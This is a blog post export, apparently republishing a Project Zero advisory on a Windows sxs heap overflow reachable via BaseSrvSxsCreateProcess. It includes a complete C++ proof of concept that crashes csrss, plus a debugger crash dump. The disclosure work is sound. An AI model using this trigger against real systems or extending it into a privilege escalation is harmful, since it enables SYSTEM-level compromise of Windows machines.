{"id":29191,"date":"2022-08-12T19:58:51","date_gmt":"2022-08-12T15:58:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168068\/GS20220812145103.txt"},"modified":"2022-08-13T11:53:24","modified_gmt":"2022-08-13T07:23:24","slug":"windows-sxscnodefactoryxmlparser_element_doc_assembly_assemblyidentity-heap-buffer-overflow","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/windows-sxscnodefactoryxmlparser_element_doc_assembly_assemblyidentity-heap-buffer-overflow\/","title":{"rendered":"Windows sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity Heap Buffer Overflow"},"content":{"rendered":"

Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity<\/p>\n

## SUMMARY
\nA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges.<\/p>\n

## VULNERABILITY DETAILS
\nIn 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn’t properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`.<\/p>\n

We’ve just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`.<\/p>\n

1. https:\/\/googleprojectzero.github.io\/0days-in-the-wild\/0day-RCAs\/2020\/CVE-2020-1027.html<\/p>\n

## VERSION
\nWindows 11 12H2 (OS Build 22000.593)
\nWindows 10 12H2 (OS Build 19044.1586)<\/p>\n

## REPRODUCTION CASE
\n1) Enable page heap verification for csrss.exe:
\n“`
\ngflags \/p \/enable csrss.exe \/full
\n“`<\/p>\n

2) Restart the machine.<\/p>\n

3) Compile and run:
\n“`
\n#pragma comment(lib, “ntdll”)<\/p>\n

#include <windows.h>
\n#include <winternl.h>
\n#include <cstdint>
\n#include <cstdio>
\n#include <string><\/p>\n

typedef struct _SECTION_IMAGE_INFORMATION {
\nPVOID EntryPoint;
\nULONG StackZeroBits;
\nULONG StackReserved;
\nULONG StackCommit;
\nULONG ImageSubsystem;
\nWORD SubSystemVersionLow;
\nWORD SubSystemVersionHigh;
\nULONG Unknown1;
\nULONG ImageCharacteristics;
\nULONG ImageMachineType;
\nULONG Unknown2[3];
\n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;<\/p>\n

typedef struct _RTL_USER_PROCESS_INFORMATION {
\nULONG Size;
\nHANDLE ProcessHandle;
\nHANDLE ThreadHandle;
\nCLIENT_ID ClientId;
\nSECTION_IMAGE_INFORMATION ImageInformation;
\nBYTE Unknown1[128];
\n} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION;<\/p>\n

NTSTATUS(NTAPI* RtlCreateProcessParameters)
\n(PRTL_USER_PROCESS_PARAMETERS*,
\nPUNICODE_STRING,
\nPUNICODE_STRING,
\nPUNICODE_STRING,
\nPUNICODE_STRING,
\nPVOID,
\nPUNICODE_STRING,
\nPUNICODE_STRING,
\nPUNICODE_STRING,
\nPUNICODE_STRING);
\nNTSTATUS(NTAPI* RtlCreateUserProcess)
\n(PUNICODE_STRING,
\nULONG,
\nPRTL_USER_PROCESS_PARAMETERS,
\nPSECURITY_DESCRIPTOR,
\nPSECURITY_DESCRIPTOR,
\nHANDLE,
\nBOOLEAN,
\nHANDLE,
\nHANDLE,
\nPRTL_USER_PROCESS_INFORMATION);<\/p>\n

PVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG);
\nVOID(NTAPI* CsrFreeCaptureBuffer)(PVOID);
\nNTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG);
\nNTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR);<\/p>\n

void CaptureString(LPVOID capture_buffer,
\nuint8_t* msg_field,
\nPCWSTR string,
\nsize_t length = 0) {
\nif (length == 0)
\nlength = lstrlenW(string);<\/p>\n

CsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2,
\nlength * 2 + 2, (PSTR)msg_field);
\n}<\/p>\n

int main() {
\nHMODULE ntdll = LoadLibrary(L”ntdll”);<\/p>\n

#define INIT_PROC(name) \\
\nname = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name));<\/p>\n

INIT_PROC(RtlCreateProcessParameters);
\nINIT_PROC(RtlCreateUserProcess);<\/p>\n

INIT_PROC(CsrAllocateCaptureBuffer);
\nINIT_PROC(CsrFreeCaptureBuffer);
\nINIT_PROC(CsrClientCallServer);
\nINIT_PROC(CsrCaptureMessageString);<\/p>\n

UNICODE_STRING image_path;
\nPRTL_USER_PROCESS_PARAMETERS proc_params;
\nRTL_USER_PROCESS_INFORMATION proc_info = {0};<\/p>\n

RtlInitUnicodeString(&image_path, L”\\\\SystemRoot\\\\notepad.exe”);
\nRtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL,
\nNULL, NULL, NULL, NULL);
\nRtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL,
\nNULL, NULL, FALSE, NULL, NULL, &proc_info);<\/p>\n

const size_t HEADER_SIZE = 0x40;
\nuint8_t msg[HEADER_SIZE + 0x1f8] = {0};<\/p>\n

#define FIELD(n) msg + HEADER_SIZE + 8 * n
\n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value;<\/p>\n

SET_FIELD(2, proc_info.ClientId.UniqueProcess);
\nSET_FIELD(3, proc_info.ClientId.UniqueThread);<\/p>\n

SET_FIELD(4, -1);
\nSET_FIELD(7, 1);
\nSET_FIELD(8, 0x20000);<\/p>\n

std::string manifest =
\n“<assembly xmlns=’urn:schemas-microsoft-com:asm.v1′ ”
\n“manifestVersion=’1.0′>”
\n“<assemblyIdentity name=’@’ version=’1.0.0.0’\/>”
\n“<\/assembly>”;
\nmanifest.replace(manifest.find(‘@’), 1, 0x4000, ‘A’);<\/p>\n

SET_FIELD(13, manifest.c_str());
\nSET_FIELD(14, manifest.size());<\/p>\n

PVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200);<\/p>\n

CaptureString(capture_buffer, FIELD(22), L”C:\\\\Windows\\\\”);
\nCaptureString(capture_buffer, FIELD(24), L”\\x00\\x00″, 2);
\nCaptureString(capture_buffer, FIELD(28), L”A”);
\nSET_FIELD(28, 0xff000002);<\/p>\n

CsrClientCallServer(msg, capture_buffer, 0x1001001d,
\nsizeof(msg) – HEADER_SIZE);
\n}
\n“`<\/p>\n

The crash should look like to the following:
\n“`
\nCONTEXT: 0000007c4afbcfc0 — (.cxr 0x7c4afbcfc0)
\nrax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010
\nrdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001
\nrip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80
\nr8=0000000000000032 r9=00000000000001f7 r10=00007ff822e6b558
\nr11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001
\nr14=0000000000000000 r15=0000000000000005
\niopl=0 nv up ei pl nz na pe nc
\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
\nntdll!memcpy+0x113:
\n0033:00007ff8`25a53c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=????????????????????????????????
\nResetting default scope<\/p>\n

WRITE_ADDRESS: 0000020e6515d000<\/p>\n

EXCEPTION_RECORD: 0000007c4afbd4b0 — (.exr 0x7c4afbd4b0)
\nExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113)
\nExceptionCode: c0000005 (Access violation)
\nExceptionFlags: 00000000
\nNumberParameters: 2
\nParameter[0]: 0000000000000001
\nParameter[1]: 0000020e6515d000
\nAttempt to write to address 0000020e6515d000<\/p>\n

STACK_TEXT:
\n0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x113
\n0000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c1
\n0000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd34
\n0000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d6
\n0000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x513
\n0000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x104
\n0000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe
\n0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x339
\n0000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed
\n0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x545
\n0000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x71
\n0000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f3
\n0000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0
\n0000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f
\n“`<\/p>\n

## CREDIT INFORMATION
\nSergei Glazunov of Google Project Zero<\/p>\n

Related CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026.<\/p>\n

Found by: glazunov@google.com<\/p>\n","protected":false},"excerpt":{"rendered":"

Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity ## SUMMARY A heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges. ## VULNERABILITY DETAILS In 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29191","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29191"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29191\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}